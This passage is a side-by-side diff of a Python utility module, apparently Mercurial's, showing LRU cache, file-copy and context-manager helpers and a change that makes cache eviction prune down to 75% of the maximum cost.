1154 """copy-on-write sortdict
1154 """copy-on-write sortdict
1155
1155
1156 Be sure to call d = d.preparewrite() before writing to d.
1156 Be sure to call d = d.preparewrite() before writing to d.
1157 """
1157 """
1158
1158
1159 class transactional(object):
1159 class transactional(object):
1160 """Base class for making a transactional type into a context manager."""
1160 """Base class for making a transactional type into a context manager."""
1161 __metaclass__ = abc.ABCMeta
1161 __metaclass__ = abc.ABCMeta
1162
1162
1163 @abc.abstractmethod
1163 @abc.abstractmethod
1164 def close(self):
1164 def close(self):
1165 """Successfully closes the transaction."""
1165 """Successfully closes the transaction."""
1166
1166
1167 @abc.abstractmethod
1167 @abc.abstractmethod
1168 def release(self):
1168 def release(self):
1169 """Marks the end of the transaction.
1169 """Marks the end of the transaction.
1170
1170
1171 If the transaction has not been closed, it will be aborted.
1171 If the transaction has not been closed, it will be aborted.
1172 """
1172 """
1173
1173
1174 def __enter__(self):
1174 def __enter__(self):
1175 return self
1175 return self
1176
1176
1177 def __exit__(self, exc_type, exc_val, exc_tb):
1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 try:
1178 try:
1179 if exc_type is None:
1179 if exc_type is None:
1180 self.close()
1180 self.close()
1181 finally:
1181 finally:
1182 self.release()
1182 self.release()
1183
1183
1184 @contextlib.contextmanager
1184 @contextlib.contextmanager
1185 def acceptintervention(tr=None):
1185 def acceptintervention(tr=None):
1186 """A context manager that closes the transaction on InterventionRequired
1186 """A context manager that closes the transaction on InterventionRequired
1187
1187
1188 If no transaction was provided, this simply runs the body and returns
1188 If no transaction was provided, this simply runs the body and returns
1189 """
1189 """
1190 if not tr:
1190 if not tr:
1191 yield
1191 yield
1192 return
1192 return
1193 try:
1193 try:
1194 yield
1194 yield
1195 tr.close()
1195 tr.close()
1196 except error.InterventionRequired:
1196 except error.InterventionRequired:
1197 tr.close()
1197 tr.close()
1198 raise
1198 raise
1199 finally:
1199 finally:
1200 tr.release()
1200 tr.release()
1201
1201
1202 @contextlib.contextmanager
1202 @contextlib.contextmanager
1203 def nullcontextmanager():
1203 def nullcontextmanager():
1204 yield
1204 yield
1205
1205
1206 class _lrucachenode(object):
1206 class _lrucachenode(object):
1207 """A node in a doubly linked list.
1207 """A node in a doubly linked list.
1208
1208
1209 Holds a reference to nodes on either side as well as a key-value
1209 Holds a reference to nodes on either side as well as a key-value
1210 pair for the dictionary entry.
1210 pair for the dictionary entry.
1211 """
1211 """
1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213
1213
1214 def __init__(self):
1214 def __init__(self):
1215 self.next = None
1215 self.next = None
1216 self.prev = None
1216 self.prev = None
1217
1217
1218 self.key = _notset
1218 self.key = _notset
1219 self.value = None
1219 self.value = None
1220 self.cost = 0
1220 self.cost = 0
1221
1221
1222 def markempty(self):
1222 def markempty(self):
1223 """Mark the node as emptied."""
1223 """Mark the node as emptied."""
1224 self.key = _notset
1224 self.key = _notset
1225 self.value = None
1225 self.value = None
1226 self.cost = 0
1226 self.cost = 0
1227
1227
1228 class lrucachedict(object):
1228 class lrucachedict(object):
1229 """Dict that caches most recent accesses and sets.
1229 """Dict that caches most recent accesses and sets.
1230
1230
1231 The dict consists of an actual backing dict - indexed by original
1231 The dict consists of an actual backing dict - indexed by original
1232 key - and a doubly linked circular list defining the order of entries in
1232 key - and a doubly linked circular list defining the order of entries in
1233 the cache.
1233 the cache.
1234
1234
1235 The head node is the newest entry in the cache. If the cache is full,
1235 The head node is the newest entry in the cache. If the cache is full,
1236 we recycle head.prev and make it the new head. Cache accesses result in
1236 we recycle head.prev and make it the new head. Cache accesses result in
1237 the node being moved to before the existing head and being marked as the
1237 the node being moved to before the existing head and being marked as the
1238 new head node.
1238 new head node.
1239
1239
1240 Items in the cache can be inserted with an optional "cost" value. This is
1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 simply an integer that is specified by the caller. The cache can be queried
1241 simply an integer that is specified by the caller. The cache can be queried
1242 for the total cost of all items presently in the cache.
1242 for the total cost of all items presently in the cache.
1243
1243
1244 The cache can also define a maximum cost. If a cache insertion would
1244 The cache can also define a maximum cost. If a cache insertion would
1245 cause the total cost of the cache to go beyond the maximum cost limit,
1245 cause the total cost of the cache to go beyond the maximum cost limit,
1246 nodes will be evicted to make room for the new code. This can be used
1246 nodes will be evicted to make room for the new code. This can be used
1247 to e.g. set a max memory limit and associate an estimated bytes size
1247 to e.g. set a max memory limit and associate an estimated bytes size
1248 cost to each item in the cache. By default, no maximum cost is enforced.
1248 cost to each item in the cache. By default, no maximum cost is enforced.
1249 """
1249 """
1250 def __init__(self, max, maxcost=0):
1250 def __init__(self, max, maxcost=0):
1251 self._cache = {}
1251 self._cache = {}
1252
1252
1253 self._head = head = _lrucachenode()
1253 self._head = head = _lrucachenode()
1254 head.prev = head
1254 head.prev = head
1255 head.next = head
1255 head.next = head
1256 self._size = 1
1256 self._size = 1
1257 self.capacity = max
1257 self.capacity = max
1258 self.totalcost = 0
1258 self.totalcost = 0
1259 self.maxcost = maxcost
1259 self.maxcost = maxcost
1260
1260
1261 def __len__(self):
1261 def __len__(self):
1262 return len(self._cache)
1262 return len(self._cache)
1263
1263
1264 def __contains__(self, k):
1264 def __contains__(self, k):
1265 return k in self._cache
1265 return k in self._cache
1266
1266
1267 def __iter__(self):
1267 def __iter__(self):
1268 # We don't have to iterate in cache order, but why not.
1268 # We don't have to iterate in cache order, but why not.
1269 n = self._head
1269 n = self._head
1270 for i in range(len(self._cache)):
1270 for i in range(len(self._cache)):
1271 yield n.key
1271 yield n.key
1272 n = n.next
1272 n = n.next
1273
1273
1274 def __getitem__(self, k):
1274 def __getitem__(self, k):
1275 node = self._cache[k]
1275 node = self._cache[k]
1276 self._movetohead(node)
1276 self._movetohead(node)
1277 return node.value
1277 return node.value
1278
1278
1279 def insert(self, k, v, cost=0):
1279 def insert(self, k, v, cost=0):
1280 """Insert a new item in the cache with optional cost value."""
1280 """Insert a new item in the cache with optional cost value."""
1281 node = self._cache.get(k)
1281 node = self._cache.get(k)
1282 # Replace existing value and mark as newest.
1282 # Replace existing value and mark as newest.
1283 if node is not None:
1283 if node is not None:
1284 self.totalcost -= node.cost
1284 self.totalcost -= node.cost
1285 node.value = v
1285 node.value = v
1286 node.cost = cost
1286 node.cost = cost
1287 self.totalcost += cost
1287 self.totalcost += cost
1288 self._movetohead(node)
1288 self._movetohead(node)
1289
1289
1290 if self.maxcost:
1290 if self.maxcost:
1291 self._enforcecostlimit()
1291 self._enforcecostlimit()
1292
1292
1293 return
1293 return
1294
1294
1295 if self._size < self.capacity:
1295 if self._size < self.capacity:
1296 node = self._addcapacity()
1296 node = self._addcapacity()
1297 else:
1297 else:
1298 # Grab the last/oldest item.
1298 # Grab the last/oldest item.
1299 node = self._head.prev
1299 node = self._head.prev
1300
1300
1301 # At capacity. Kill the old entry.
1301 # At capacity. Kill the old entry.
1302 if node.key is not _notset:
1302 if node.key is not _notset:
1303 self.totalcost -= node.cost
1303 self.totalcost -= node.cost
1304 del self._cache[node.key]
1304 del self._cache[node.key]
1305
1305
1306 node.key = k
1306 node.key = k
1307 node.value = v
1307 node.value = v
1308 node.cost = cost
1308 node.cost = cost
1309 self.totalcost += cost
1309 self.totalcost += cost
1310 self._cache[k] = node
1310 self._cache[k] = node
1311 # And mark it as newest entry. No need to adjust order since it
1311 # And mark it as newest entry. No need to adjust order since it
1312 # is already self._head.prev.
1312 # is already self._head.prev.
1313 self._head = node
1313 self._head = node
1314
1314
1315 if self.maxcost:
1315 if self.maxcost:
1316 self._enforcecostlimit()
1316 self._enforcecostlimit()
1317
1317
1318 def __setitem__(self, k, v):
1318 def __setitem__(self, k, v):
1319 self.insert(k, v)
1319 self.insert(k, v)
1320
1320
1321 def __delitem__(self, k):
1321 def __delitem__(self, k):
1322 node = self._cache.pop(k)
1322 node = self._cache.pop(k)
1323 self.totalcost -= node.cost
1323 self.totalcost -= node.cost
1324 node.markempty()
1324 node.markempty()
1325
1325
1326 # Temporarily mark as newest item before re-adjusting head to make
1326 # Temporarily mark as newest item before re-adjusting head to make
1327 # this node the oldest item.
1327 # this node the oldest item.
1328 self._movetohead(node)
1328 self._movetohead(node)
1329 self._head = node.next
1329 self._head = node.next
1330
1330
1331 # Additional dict methods.
1331 # Additional dict methods.
1332
1332
1333 def get(self, k, default=None):
1333 def get(self, k, default=None):
1334 try:
1334 try:
1335 return self._cache[k].value
1335 return self._cache[k].value
1336 except KeyError:
1336 except KeyError:
1337 return default
1337 return default
1338
1338
1339 def clear(self):
1339 def clear(self):
1340 n = self._head
1340 n = self._head
1341 while n.key is not _notset:
1341 while n.key is not _notset:
1342 self.totalcost -= n.cost
1342 self.totalcost -= n.cost
1343 n.markempty()
1343 n.markempty()
1344 n = n.next
1344 n = n.next
1345
1345
1346 self._cache.clear()
1346 self._cache.clear()
1347
1347
1348 def copy(self, capacity=None, maxcost=0):
1348 def copy(self, capacity=None, maxcost=0):
1349 """Create a new cache as a copy of the current one.
1349 """Create a new cache as a copy of the current one.
1350
1350
1351 By default, the new cache has the same capacity as the existing one.
1351 By default, the new cache has the same capacity as the existing one.
1352 But, the cache capacity can be changed as part of performing the
1352 But, the cache capacity can be changed as part of performing the
1353 copy.
1353 copy.
1354
1354
1355 Items in the copy have an insertion/access order matching this
1355 Items in the copy have an insertion/access order matching this
1356 instance.
1356 instance.
1357 """
1357 """
1358
1358
1359 capacity = capacity or self.capacity
1359 capacity = capacity or self.capacity
1360 maxcost = maxcost or self.maxcost
1360 maxcost = maxcost or self.maxcost
1361 result = lrucachedict(capacity, maxcost=maxcost)
1361 result = lrucachedict(capacity, maxcost=maxcost)
1362
1362
1363 # We copy entries by iterating in oldest-to-newest order so the copy
1363 # We copy entries by iterating in oldest-to-newest order so the copy
1364 # has the correct ordering.
1364 # has the correct ordering.
1365
1365
1366 # Find the first non-empty entry.
1366 # Find the first non-empty entry.
1367 n = self._head.prev
1367 n = self._head.prev
1368 while n.key is _notset and n is not self._head:
1368 while n.key is _notset and n is not self._head:
1369 n = n.prev
1369 n = n.prev
1370
1370
1371 # We could potentially skip the first N items when decreasing capacity.
1371 # We could potentially skip the first N items when decreasing capacity.
1372 # But let's keep it simple unless it is a performance problem.
1372 # But let's keep it simple unless it is a performance problem.
1373 for i in range(len(self._cache)):
1373 for i in range(len(self._cache)):
1374 result.insert(n.key, n.value, cost=n.cost)
1374 result.insert(n.key, n.value, cost=n.cost)
1375 n = n.prev
1375 n = n.prev
1376
1376
1377 return result
1377 return result
1378
1378
1379 def popoldest(self):
1379 def popoldest(self):
1380 """Remove the oldest item from the cache.
1380 """Remove the oldest item from the cache.
1381
1381
1382 Returns the (key, value) describing the removed cache entry.
1382 Returns the (key, value) describing the removed cache entry.
1383 """
1383 """
1384 if not self._cache:
1384 if not self._cache:
1385 return
1385 return
1386
1386
1387 # Walk the linked list backwards starting at tail node until we hit
1387 # Walk the linked list backwards starting at tail node until we hit
1388 # a non-empty node.
1388 # a non-empty node.
1389 n = self._head.prev
1389 n = self._head.prev
1390 while n.key is _notset:
1390 while n.key is _notset:
1391 n = n.prev
1391 n = n.prev
1392
1392
1393 key, value = n.key, n.value
1393 key, value = n.key, n.value
1394
1394
1395 # And remove it from the cache and mark it as empty.
1395 # And remove it from the cache and mark it as empty.
1396 del self._cache[n.key]
1396 del self._cache[n.key]
1397 self.totalcost -= n.cost
1397 self.totalcost -= n.cost
1398 n.markempty()
1398 n.markempty()
1399
1399
1400 return key, value
1400 return key, value
1401
1401
1402 def _movetohead(self, node):
1402 def _movetohead(self, node):
1403 """Mark a node as the newest, making it the new head.
1403 """Mark a node as the newest, making it the new head.
1404
1404
1405 When a node is accessed, it becomes the freshest entry in the LRU
1405 When a node is accessed, it becomes the freshest entry in the LRU
1406 list, which is denoted by self._head.
1406 list, which is denoted by self._head.
1407
1407
1408 Visually, let's make ``N`` the new head node (* denotes head):
1408 Visually, let's make ``N`` the new head node (* denotes head):
1409
1409
1410 previous/oldest <-> head <-> next/next newest
1410 previous/oldest <-> head <-> next/next newest
1411
1411
1412 ----<->--- A* ---<->-----
1412 ----<->--- A* ---<->-----
1413 | |
1413 | |
1414 E <-> D <-> N <-> C <-> B
1414 E <-> D <-> N <-> C <-> B
1415
1415
1416 To:
1416 To:
1417
1417
1418 ----<->--- N* ---<->-----
1418 ----<->--- N* ---<->-----
1419 | |
1419 | |
1420 E <-> D <-> C <-> B <-> A
1420 E <-> D <-> C <-> B <-> A
1421
1421
1422 This requires the following moves:
1422 This requires the following moves:
1423
1423
1424 C.next = D (node.prev.next = node.next)
1424 C.next = D (node.prev.next = node.next)
1425 D.prev = C (node.next.prev = node.prev)
1425 D.prev = C (node.next.prev = node.prev)
1426 E.next = N (head.prev.next = node)
1426 E.next = N (head.prev.next = node)
1427 N.prev = E (node.prev = head.prev)
1427 N.prev = E (node.prev = head.prev)
1428 N.next = A (node.next = head)
1428 N.next = A (node.next = head)
1429 A.prev = N (head.prev = node)
1429 A.prev = N (head.prev = node)
1430 """
1430 """
1431 head = self._head
1431 head = self._head
1432 # C.next = D
1432 # C.next = D
1433 node.prev.next = node.next
1433 node.prev.next = node.next
1434 # D.prev = C
1434 # D.prev = C
1435 node.next.prev = node.prev
1435 node.next.prev = node.prev
1436 # N.prev = E
1436 # N.prev = E
1437 node.prev = head.prev
1437 node.prev = head.prev
1438 # N.next = A
1438 # N.next = A
1439 # It is tempting to do just "head" here, however if node is
1439 # It is tempting to do just "head" here, however if node is
1440 # adjacent to head, this will do bad things.
1440 # adjacent to head, this will do bad things.
1441 node.next = head.prev.next
1441 node.next = head.prev.next
1442 # E.next = N
1442 # E.next = N
1443 node.next.prev = node
1443 node.next.prev = node
1444 # A.prev = N
1444 # A.prev = N
1445 node.prev.next = node
1445 node.prev.next = node
1446
1446
1447 self._head = node
1447 self._head = node
1448
1448
1449 def _addcapacity(self):
1449 def _addcapacity(self):
1450 """Add a node to the circular linked list.
1450 """Add a node to the circular linked list.
1451
1451
1452 The new node is inserted before the head node.
1452 The new node is inserted before the head node.
1453 """
1453 """
1454 head = self._head
1454 head = self._head
1455 node = _lrucachenode()
1455 node = _lrucachenode()
1456 head.prev.next = node
1456 head.prev.next = node
1457 node.prev = head.prev
1457 node.prev = head.prev
1458 node.next = head
1458 node.next = head
1459 head.prev = node
1459 head.prev = node
1460 self._size += 1
1460 self._size += 1
1461 return node
1461 return node
1462
1462
1463 def _enforcecostlimit(self):
1463 def _enforcecostlimit(self):
1464 # This should run after an insertion. It should only be called if total
1464 # This should run after an insertion. It should only be called if total
1465 # cost limits are being enforced.
1465 # cost limits are being enforced.
1466 # The most recently inserted node is never evicted.
1466 # The most recently inserted node is never evicted.
1467 if len(self) <= 1 or self.totalcost <= self.maxcost:
1467 if len(self) <= 1 or self.totalcost <= self.maxcost:
1468 return
1468 return
1469
1469
1470 # This is logically equivalent to calling popoldest() until we
1470 # This is logically equivalent to calling popoldest() until we
1471 # free up enough cost. We don't do that since popoldest() needs
1471 # free up enough cost. We don't do that since popoldest() needs
1472 # to walk the linked list and doing this in a loop would be
1472 # to walk the linked list and doing this in a loop would be
1473 # quadratic. So we find the first non-empty node and then
1473 # quadratic. So we find the first non-empty node and then
1474 # walk nodes until we free up enough capacity.
1474 # walk nodes until we free up enough capacity.
1475 #
1476 # If we only removed the minimum number of nodes to free enough
1477 # cost at insert time, chances are high that the next insert would
1478 # also require pruning. This would effectively constitute quadratic
1479 # behavior for insert-heavy workloads. To mitigate this, we set a
1480 # target cost that is a percentage of the max cost. This will tend
1481 # to free more nodes when the high water mark is reached, which
1482 # lowers the chances of needing to prune on the subsequent insert.
1483 targetcost = int(self.maxcost * 0.75)
1484
1475 n = self._head.prev
1485 n = self._head.prev
1476 while n.key is _notset:
1486 while n.key is _notset:
1477 n = n.prev
1487 n = n.prev
1478
1488
1479 while len(self) > 1 and self.totalcost > self.maxcost:
1489 while len(self) > 1 and self.totalcost > targetcost:
1480 del self._cache[n.key]
1490 del self._cache[n.key]
1481 self.totalcost -= n.cost
1491 self.totalcost -= n.cost
1482 n.markempty()
1492 n.markempty()
1483 n = n.prev
1493 n = n.prev
1484
1494
1485 def lrucachefunc(func):
1495 def lrucachefunc(func):
1486 '''cache most recent results of function calls'''
1496 '''cache most recent results of function calls'''
1487 cache = {}
1497 cache = {}
1488 order = collections.deque()
1498 order = collections.deque()
1489 if func.__code__.co_argcount == 1:
1499 if func.__code__.co_argcount == 1:
1490 def f(arg):
1500 def f(arg):
1491 if arg not in cache:
1501 if arg not in cache:
1492 if len(cache) > 20:
1502 if len(cache) > 20:
1493 del cache[order.popleft()]
1503 del cache[order.popleft()]
1494 cache[arg] = func(arg)
1504 cache[arg] = func(arg)
1495 else:
1505 else:
1496 order.remove(arg)
1506 order.remove(arg)
1497 order.append(arg)
1507 order.append(arg)
1498 return cache[arg]
1508 return cache[arg]
1499 else:
1509 else:
1500 def f(*args):
1510 def f(*args):
1501 if args not in cache:
1511 if args not in cache:
1502 if len(cache) > 20:
1512 if len(cache) > 20:
1503 del cache[order.popleft()]
1513 del cache[order.popleft()]
1504 cache[args] = func(*args)
1514 cache[args] = func(*args)
1505 else:
1515 else:
1506 order.remove(args)
1516 order.remove(args)
1507 order.append(args)
1517 order.append(args)
1508 return cache[args]
1518 return cache[args]
1509
1519
1510 return f
1520 return f
1511
1521
1512 class propertycache(object):
1522 class propertycache(object):
1513 def __init__(self, func):
1523 def __init__(self, func):
1514 self.func = func
1524 self.func = func
1515 self.name = func.__name__
1525 self.name = func.__name__
1516 def __get__(self, obj, type=None):
1526 def __get__(self, obj, type=None):
1517 result = self.func(obj)
1527 result = self.func(obj)
1518 self.cachevalue(obj, result)
1528 self.cachevalue(obj, result)
1519 return result
1529 return result
1520
1530
1521 def cachevalue(self, obj, value):
1531 def cachevalue(self, obj, value):
1522 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1532 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1523 obj.__dict__[self.name] = value
1533 obj.__dict__[self.name] = value
1524
1534
1525 def clearcachedproperty(obj, prop):
1535 def clearcachedproperty(obj, prop):
1526 '''clear a cached property value, if one has been set'''
1536 '''clear a cached property value, if one has been set'''
1527 if prop in obj.__dict__:
1537 if prop in obj.__dict__:
1528 del obj.__dict__[prop]
1538 del obj.__dict__[prop]
1529
1539
1530 def increasingchunks(source, min=1024, max=65536):
1540 def increasingchunks(source, min=1024, max=65536):
1531 '''return no less than min bytes per chunk while data remains,
1541 '''return no less than min bytes per chunk while data remains,
1532 doubling min after each chunk until it reaches max'''
1542 doubling min after each chunk until it reaches max'''
1533 def log2(x):
1543 def log2(x):
1534 if not x:
1544 if not x:
1535 return 0
1545 return 0
1536 i = 0
1546 i = 0
1537 while x:
1547 while x:
1538 x >>= 1
1548 x >>= 1
1539 i += 1
1549 i += 1
1540 return i - 1
1550 return i - 1
1541
1551
1542 buf = []
1552 buf = []
1543 blen = 0
1553 blen = 0
1544 for chunk in source:
1554 for chunk in source:
1545 buf.append(chunk)
1555 buf.append(chunk)
1546 blen += len(chunk)
1556 blen += len(chunk)
1547 if blen >= min:
1557 if blen >= min:
1548 if min < max:
1558 if min < max:
1549 min = min << 1
1559 min = min << 1
1550 nmin = 1 << log2(blen)
1560 nmin = 1 << log2(blen)
1551 if nmin > min:
1561 if nmin > min:
1552 min = nmin
1562 min = nmin
1553 if min > max:
1563 if min > max:
1554 min = max
1564 min = max
1555 yield ''.join(buf)
1565 yield ''.join(buf)
1556 blen = 0
1566 blen = 0
1557 buf = []
1567 buf = []
1558 if buf:
1568 if buf:
1559 yield ''.join(buf)
1569 yield ''.join(buf)
1560
1570
1561 def always(fn):
1571 def always(fn):
1562 return True
1572 return True
1563
1573
1564 def never(fn):
1574 def never(fn):
1565 return False
1575 return False
1566
1576
1567 def nogc(func):
1577 def nogc(func):
1568 """disable garbage collector
1578 """disable garbage collector
1569
1579
1570 Python's garbage collector triggers a GC each time a certain number of
1580 Python's garbage collector triggers a GC each time a certain number of
1571 container objects (the number being defined by gc.get_threshold()) are
1581 container objects (the number being defined by gc.get_threshold()) are
1572 allocated even when marked not to be tracked by the collector. Tracking has
1582 allocated even when marked not to be tracked by the collector. Tracking has
1573 no effect on when GCs are triggered, only on what objects the GC looks
1583 no effect on when GCs are triggered, only on what objects the GC looks
1574 into. As a workaround, disable GC while building complex (huge)
1584 into. As a workaround, disable GC while building complex (huge)
1575 containers.
1585 containers.
1576
1586
1577 This garbage collector issue have been fixed in 2.7. But it still affect
1587 This garbage collector issue have been fixed in 2.7. But it still affect
1578 CPython's performance.
1588 CPython's performance.
1579 """
1589 """
1580 def wrapper(*args, **kwargs):
1590 def wrapper(*args, **kwargs):
1581 gcenabled = gc.isenabled()
1591 gcenabled = gc.isenabled()
1582 gc.disable()
1592 gc.disable()
1583 try:
1593 try:
1584 return func(*args, **kwargs)
1594 return func(*args, **kwargs)
1585 finally:
1595 finally:
1586 if gcenabled:
1596 if gcenabled:
1587 gc.enable()
1597 gc.enable()
1588 return wrapper
1598 return wrapper
1589
1599
1590 if pycompat.ispypy:
1600 if pycompat.ispypy:
1591 # PyPy runs slower with gc disabled
1601 # PyPy runs slower with gc disabled
1592 nogc = lambda x: x
1602 nogc = lambda x: x
1593
1603
1594 def pathto(root, n1, n2):
1604 def pathto(root, n1, n2):
1595 '''return the relative path from one place to another.
1605 '''return the relative path from one place to another.
1596 root should use os.sep to separate directories
1606 root should use os.sep to separate directories
1597 n1 should use os.sep to separate directories
1607 n1 should use os.sep to separate directories
1598 n2 should use "/" to separate directories
1608 n2 should use "/" to separate directories
1599 returns an os.sep-separated path.
1609 returns an os.sep-separated path.
1600
1610
1601 If n1 is a relative path, it's assumed it's
1611 If n1 is a relative path, it's assumed it's
1602 relative to root.
1612 relative to root.
1603 n2 should always be relative to root.
1613 n2 should always be relative to root.
1604 '''
1614 '''
1605 if not n1:
1615 if not n1:
1606 return localpath(n2)
1616 return localpath(n2)
1607 if os.path.isabs(n1):
1617 if os.path.isabs(n1):
1608 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1618 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1609 return os.path.join(root, localpath(n2))
1619 return os.path.join(root, localpath(n2))
1610 n2 = '/'.join((pconvert(root), n2))
1620 n2 = '/'.join((pconvert(root), n2))
1611 a, b = splitpath(n1), n2.split('/')
1621 a, b = splitpath(n1), n2.split('/')
1612 a.reverse()
1622 a.reverse()
1613 b.reverse()
1623 b.reverse()
1614 while a and b and a[-1] == b[-1]:
1624 while a and b and a[-1] == b[-1]:
1615 a.pop()
1625 a.pop()
1616 b.pop()
1626 b.pop()
1617 b.reverse()
1627 b.reverse()
1618 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1628 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1619
1629
1620 # the location of data files matching the source code
1630 # the location of data files matching the source code
1621 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1631 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1622 # executable version (py2exe) doesn't support __file__
1632 # executable version (py2exe) doesn't support __file__
1623 datapath = os.path.dirname(pycompat.sysexecutable)
1633 datapath = os.path.dirname(pycompat.sysexecutable)
1624 else:
1634 else:
1625 datapath = os.path.dirname(pycompat.fsencode(__file__))
1635 datapath = os.path.dirname(pycompat.fsencode(__file__))
1626
1636
1627 i18n.setdatapath(datapath)
1637 i18n.setdatapath(datapath)
1628
1638
1629 def checksignature(func):
1639 def checksignature(func):
1630 '''wrap a function with code to check for calling errors'''
1640 '''wrap a function with code to check for calling errors'''
1631 def check(*args, **kwargs):
1641 def check(*args, **kwargs):
1632 try:
1642 try:
1633 return func(*args, **kwargs)
1643 return func(*args, **kwargs)
1634 except TypeError:
1644 except TypeError:
1635 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1645 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1636 raise error.SignatureError
1646 raise error.SignatureError
1637 raise
1647 raise
1638
1648
1639 return check
1649 return check
1640
1650
1641 # a whilelist of known filesystems where hardlink works reliably
1651 # a whilelist of known filesystems where hardlink works reliably
1642 _hardlinkfswhitelist = {
1652 _hardlinkfswhitelist = {
1643 'apfs',
1653 'apfs',
1644 'btrfs',
1654 'btrfs',
1645 'ext2',
1655 'ext2',
1646 'ext3',
1656 'ext3',
1647 'ext4',
1657 'ext4',
1648 'hfs',
1658 'hfs',
1649 'jfs',
1659 'jfs',
1650 'NTFS',
1660 'NTFS',
1651 'reiserfs',
1661 'reiserfs',
1652 'tmpfs',
1662 'tmpfs',
1653 'ufs',
1663 'ufs',
1654 'xfs',
1664 'xfs',
1655 'zfs',
1665 'zfs',
1656 }
1666 }
1657
1667
1658 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1668 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1659 '''copy a file, preserving mode and optionally other stat info like
1669 '''copy a file, preserving mode and optionally other stat info like
1660 atime/mtime
1670 atime/mtime
1661
1671
1662 checkambig argument is used with filestat, and is useful only if
1672 checkambig argument is used with filestat, and is useful only if
1663 destination file is guarded by any lock (e.g. repo.lock or
1673 destination file is guarded by any lock (e.g. repo.lock or
1664 repo.wlock).
1674 repo.wlock).
1665
1675
1666 copystat and checkambig should be exclusive.
1676 copystat and checkambig should be exclusive.
1667 '''
1677 '''
1668 assert not (copystat and checkambig)
1678 assert not (copystat and checkambig)
1669 oldstat = None
1679 oldstat = None
1670 if os.path.lexists(dest):
1680 if os.path.lexists(dest):
1671 if checkambig:
1681 if checkambig:
1672 oldstat = checkambig and filestat.frompath(dest)
1682 oldstat = checkambig and filestat.frompath(dest)
1673 unlink(dest)
1683 unlink(dest)
1674 if hardlink:
1684 if hardlink:
1675 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1685 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1676 # unless we are confident that dest is on a whitelisted filesystem.
1686 # unless we are confident that dest is on a whitelisted filesystem.
1677 try:
1687 try:
1678 fstype = getfstype(os.path.dirname(dest))
1688 fstype = getfstype(os.path.dirname(dest))
1679 except OSError:
1689 except OSError:
1680 fstype = None
1690 fstype = None
1681 if fstype not in _hardlinkfswhitelist:
1691 if fstype not in _hardlinkfswhitelist:
1682 hardlink = False
1692 hardlink = False
1683 if hardlink:
1693 if hardlink:
1684 try:
1694 try:
1685 oslink(src, dest)
1695 oslink(src, dest)
1686 return
1696 return
1687 except (IOError, OSError):
1697 except (IOError, OSError):
1688 pass # fall back to normal copy
1698 pass # fall back to normal copy
1689 if os.path.islink(src):
1699 if os.path.islink(src):
1690 os.symlink(os.readlink(src), dest)
1700 os.symlink(os.readlink(src), dest)
1691 # copytime is ignored for symlinks, but in general copytime isn't needed
1701 # copytime is ignored for symlinks, but in general copytime isn't needed
1692 # for them anyway
1702 # for them anyway
1693 else:
1703 else:
1694 try:
1704 try:
1695 shutil.copyfile(src, dest)
1705 shutil.copyfile(src, dest)
1696 if copystat:
1706 if copystat:
1697 # copystat also copies mode
1707 # copystat also copies mode
1698 shutil.copystat(src, dest)
1708 shutil.copystat(src, dest)
1699 else:
1709 else:
1700 shutil.copymode(src, dest)
1710 shutil.copymode(src, dest)
1701 if oldstat and oldstat.stat:
1711 if oldstat and oldstat.stat:
1702 newstat = filestat.frompath(dest)
1712 newstat = filestat.frompath(dest)
1703 if newstat.isambig(oldstat):
1713 if newstat.isambig(oldstat):
1704 # stat of copied file is ambiguous to original one
1714 # stat of copied file is ambiguous to original one
1705 advanced = (
1715 advanced = (
1706 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1716 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1707 os.utime(dest, (advanced, advanced))
1717 os.utime(dest, (advanced, advanced))
1708 except shutil.Error as inst:
1718 except shutil.Error as inst:
1709 raise error.Abort(str(inst))
1719 raise error.Abort(str(inst))
1710
1720
1711 def copyfiles(src, dst, hardlink=None, progress=None):
1721 def copyfiles(src, dst, hardlink=None, progress=None):
1712 """Copy a directory tree using hardlinks if possible."""
1722 """Copy a directory tree using hardlinks if possible."""
1713 num = 0
1723 num = 0
1714
1724
1715 def settopic():
1725 def settopic():
1716 if progress:
1726 if progress:
1717 progress.topic = _('linking') if hardlink else _('copying')
1727 progress.topic = _('linking') if hardlink else _('copying')
1718
1728
1719 if os.path.isdir(src):
1729 if os.path.isdir(src):
1720 if hardlink is None:
1730 if hardlink is None:
1721 hardlink = (os.stat(src).st_dev ==
1731 hardlink = (os.stat(src).st_dev ==
1722 os.stat(os.path.dirname(dst)).st_dev)
1732 os.stat(os.path.dirname(dst)).st_dev)
1723 settopic()
1733 settopic()
1724 os.mkdir(dst)
1734 os.mkdir(dst)
1725 for name, kind in listdir(src):
1735 for name, kind in listdir(src):
1726 srcname = os.path.join(src, name)
1736 srcname = os.path.join(src, name)
1727 dstname = os.path.join(dst, name)
1737 dstname = os.path.join(dst, name)
1728 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1738 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1729 num += n
1739 num += n
1730 else:
1740 else:
1731 if hardlink is None:
1741 if hardlink is None:
1732 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1742 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1733 os.stat(os.path.dirname(dst)).st_dev)
1743 os.stat(os.path.dirname(dst)).st_dev)
1734 settopic()
1744 settopic()
1735
1745
1736 if hardlink:
1746 if hardlink:
1737 try:
1747 try:
1738 oslink(src, dst)
1748 oslink(src, dst)
1739 except (IOError, OSError):
1749 except (IOError, OSError):
